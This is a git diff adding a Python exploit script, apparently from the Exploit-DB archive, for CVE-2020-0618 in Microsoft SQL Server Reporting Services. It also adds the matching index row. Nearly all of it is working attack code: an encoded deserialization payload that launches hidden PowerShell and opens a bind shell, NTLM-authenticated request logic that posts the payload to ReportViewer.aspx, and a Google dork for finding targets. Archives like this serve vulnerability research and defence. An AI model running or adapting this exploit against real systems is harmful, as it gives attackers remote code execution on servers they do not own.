diff --git a/exploits/windows/remote/48816.py b/exploits/windows/remote/48816.py new file mode 100755 index 000000000..3f658eccb --- /dev/null +++ b/exploits/windows/remote/48816.py @@ -0,0 +1,194 @@ +# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution +# Google Dork: inurl:ReportViewer.aspx +# Date: 2020-09-17 +# Exploit Author: West Shepherd +# Vendor Homepage: https://www.microsoft.com +# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR), +Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL +Server 2012 32-bit/x64 SP2 (QFE) +# Tested on: Windows 2016 +# CVE : CVE-2020-0618 +# Credit goes to Soroush Dalili +# Source: +# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618 +# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ + +#!/usr/bin/python +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from requests_ntlm import HttpNtlmAuth +import argparse, requests, logging +from bs4 import BeautifulSoup +from sys import argv, exit, stderr, stdout + +# to create a payload (default is bindshell on 0.0.0.0:65535): +# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..." + + +class Exploit: + payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAqAUvYyBwb3dlcnNoZWxsLmV4ZSAtZXhlYyBieXBhc3MgLW5vbmludGVyYWN0aXZlIC1ub2V4aXQgLXdpbmRvd3N0eWxlIGhpZGRlbiAtYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5c3RlbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVpYUXVjMjlqYTJWMGN5NTBZM0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTG1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1p5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL' + timeout = 0.5 + cookies = {} + params = {} + + def __init__(self, opt): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.username = '%s\\%s' % (opt.domain, opt.username) + self.target = '%s%s' % (opt.target, opt.path) + self.password = opt.password + self.session = requests.session() + self.redirect = opt.redirect + self.proxies = { + 'http': 'http://%s' % opt.proxy, + 'https': 'http://%s' % opt.proxy + } if opt.proxy != '' else {} + self.headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko)', + 'Content-Type': 'application/x-www-form-urlencoded' + } + self.form = { + '__VIEWSTATE': '', + 'NavigationCorrector$PageState': 'NeedsCorrection', + 'NavigationCorrector$ViewState': self.payload + } + if opt.debug: + self.debug() + + def info(self, message): + stdout.write('[+] %s\n' % str(message)) + return self + + def error(self, message): + stderr.write('[-] error: %s\n' % str(message)) + return self + + def doGet(self, url, params=None, values=None): + self.info('sending get request to %s' % url) + try: + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=values, + params=params, + auth=HttpNtlmAuth(self.username, self.password) + ) if self.username != '\\' else self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=values, + params=params + ) + except Exception as err: + self.error(err) + + def doPost(self, url, values=None, params=None): + self.info('sending post request to %s' % url) + try: + return self.session.post( + url=url, + data=values, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params, + auth=HttpNtlmAuth(self.username, self.password) + ) if self.username != '\\' else self.session.post( + url=url, + data=values, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + except Exception as err: + self.error(err) + + def parsePage(self, content): + self.info('parsing form values') + soup = BeautifulSoup(content, 'lxml') + for tag in soup.select('input'): + try: + self.form[tag['name']] = tag['value'] + except Exception as err: + self.error(err) + return self + + def debug(self): + self.info('debugging enabled') + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def getForm(self): + self.info('retrieving form values') + resp = self.doGet(url=self.target) + self.parsePage(content=resp.content) + return self + + def exploit(self): + self.info('exploiting target') + resp = self.doPost(url=self.target, params=self.params, +values=self.form) + self.info('received response %d' % resp.status_code) + return self + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + description='CVE-2020-0618 SQL Server Reporting Services +ViewState Deserialization exploit', + add_help=True + ) + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com ') + parser.add_argument('-username', action='store', default='', +help='Username to use: first.last') + parser.add_argument('-domain', action='store', default='', +help='User domain to use: domain.local') + parser.add_argument('-password', action='store', default='', +help='Password to use: Summer2020') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-redirect', action='store', +default=False, help='Follow redirects: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + parser.add_argument('-path', action='store', +default='/ReportServer/pages/ReportViewer.aspx', help='Path to page') + + if len(argv) == 1: + parser.print_help() + exit(1) + + options = parser.parse_args() + Exploit(opt=options).exploit() + + except Exception as error: + stderr.write('[-] error in main %s\n' % str(error)) + + +Regards, + +West Shepherd +OSWE | OSCE | OSCP | OSWP | CEH | Security+ +West Lee Shepherd, LLC \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 718d30d16..6b3ad6298 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17816,6 +17816,7 @@ id,file,description,date,author,type,platform,port 42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware, 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux, 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858 +48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows, 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java, 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware, 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,